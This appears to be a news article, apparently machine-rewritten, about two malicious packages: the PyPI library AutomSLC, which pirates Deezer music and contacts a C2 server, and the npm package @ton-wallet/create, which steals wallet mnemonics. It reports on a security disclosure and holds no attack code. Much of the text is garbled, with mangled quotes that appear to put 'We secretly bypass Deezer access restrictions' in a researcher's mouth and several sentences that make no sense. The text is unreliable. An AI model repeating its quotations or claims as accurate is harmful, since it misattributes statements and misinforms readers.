Cybersecurity researchers have flagged malicious Python libraries in their Python Package Index (PYPI) repository, encouraging unauthorized music downloads from music streaming service Deezer.
The package in question is AutomSLC, which has been downloaded over 104,000 times so far. It was first published in May 2019 and is available on Pypi as of this writing.
“AutomSLC, which has been downloaded more than 100,000 times, is intended to provide music automation and metadata search, but also embed hardcoded credentials and communicate with external command and control (C2) servers. “We secretly bypass Deezer access restrictions,” Kirill Boychenko said in a report released today.
Specifically, this package is complete in violation of Deezer’s API terminology by users to log in to French music streaming platforms via hardcoded credentials, collect track-related metadata, and It is designed to download audio files.
The package also “regularly communicates with remote servers located at 54.39.49[.]17:8031” Provides up-to-date information on download status, thereby centralizing threat actors’ control over coordinated music piracy operations.
Put another way, AutomSLC effectively turns package users’ systems into illegal networks, and promotes bulk music downloads in unauthorized ways. The IP address is associated with a domain named “Automusic”[.]Win, “It is said that threat actors are used to oversee distributed download operations.
“Deezer’s API terminology prohibits local or offline storage of full audio content, but by downloading and decrypting the entire track, AutomSLC bypasses this limit and legally affects users. “It could put you at risk,” Boychenko said.
Software supply chain security companies disclose when they detail an incorrect NPM package called @ton-Wallet/Create that spoofs a legitimate @Ton/Ton package, while stealing mnemonic phrases from unsuspecting users and developers. will be done.
First published in the NPM registry in August 2024, the package has collected 584 downloads so far. Downloads are still available.
Malicious features embedded in the library can extract processes. Mnemonic environment variables can give threat actors full access to cryptocurrency wallets and potentially emit victims’ digital assets. The information is sent to an attacker-controlled telegram bot.
“This attack poses serious supply chain security risks and targets developers and users who are integrating developers and users into their applications,” Socket said. “Periodic dependent auditing and automated scanning tools should be adopted to detect abnormal or malicious behavior in third-party packages before integration into a production environment.”
Source link
